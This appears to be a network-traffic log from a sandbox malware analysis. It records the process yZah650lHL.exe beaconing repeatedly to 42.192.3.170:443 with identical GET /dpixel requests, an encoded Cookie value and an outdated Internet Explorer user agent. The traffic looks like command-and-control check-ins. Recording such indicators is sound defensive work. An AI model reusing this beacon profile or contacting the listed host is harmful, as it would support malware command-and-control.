                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:27 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:27 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 17 | Source IP: 192.168.2.4 | Source Port: 49753 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:28 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:29 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:29 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 18 | Source IP: 192.168.2.4 | Source Port: 49754 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:30 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:31 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:31 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 19 | Source IP: 192.168.2.4 | Source Port: 49755 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:32 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:33 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:33 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 20 | Source IP: 192.168.2.4 | Source Port: 49756 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:34 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:35 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:34 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 21 | Source IP: 192.168.2.4 | Source Port: 49757 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:36 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:36 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:36 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 22 | Source IP: 192.168.2.4 | Source Port: 49758 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:38 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:39 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:39 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 23 | Source IP: 192.168.2.4 | Source Port: 49759 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:40 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:41 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:40 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 24 | Source IP: 192.168.2.4 | Source Port: 49760 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:42 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:42 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:42 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 25 | Source IP: 192.168.2.4 | Source Port: 49761 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:44 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:44 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:44 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 26 | Source IP: 192.168.2.4 | Source Port: 49762 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:46 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:46 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:46 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 27 | Source IP: 192.168.2.4 | Source Port: 49763 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:48 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Timestamp: 2025-01-03 01:52:48 UTC | Bytes transferred: 114 | Direction: IN | Data:
                  HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:48 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID: 28 | Source IP: 192.168.2.4 | Source Port: 49764 | Destination IP: 42.192.3.170 | Destination Port: 443 | PID: 6572 | Process: C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp: 2025-01-03 01:52:50 UTC | Bytes transferred: 352 | Direction: OUT | Data:
                  GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:50 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:50 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  29          192.168.2.4  49765        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:52:51 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:52 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:52 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  30          192.168.2.4  49767        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:52:53 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:54 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:54 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  31          192.168.2.4  49769        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:52:55 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:56 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:56 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  32          192.168.2.4  49780        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:52:57 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:58 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:57 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  33          192.168.2.4  49794        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:52:59 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:59 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:59 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  34          192.168.2.4  49807        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:01 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:01 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:01 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  35          192.168.2.4  49819        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:03 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:03 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:03 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  36          192.168.2.4  49832        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:05 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:05 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:05 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  37          192.168.2.4  49844        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:06 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:07 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:07 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  38          192.168.2.4  49856        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:09 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:09 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:09 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  39          192.168.2.4  49865        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:10 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:11 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:11 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  40          192.168.2.4  49879        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:12 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:13 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:13 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  41          192.168.2.4  49892        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:14 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:15 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:14 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  42          192.168.2.4  49905        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:16 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:16 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:16 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  43          192.168.2.4  49918        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:18 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:18 UTC  114                IN         HTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:18 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  44          192.168.2.4  49930        42.192.3.170    443               6572  C:\Users\user\Desktop\yZah650lHL.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2025-01-03 01:53:20 UTC  352                OUT        GET /dpixel HTTP/1.1
                  Accept: */*
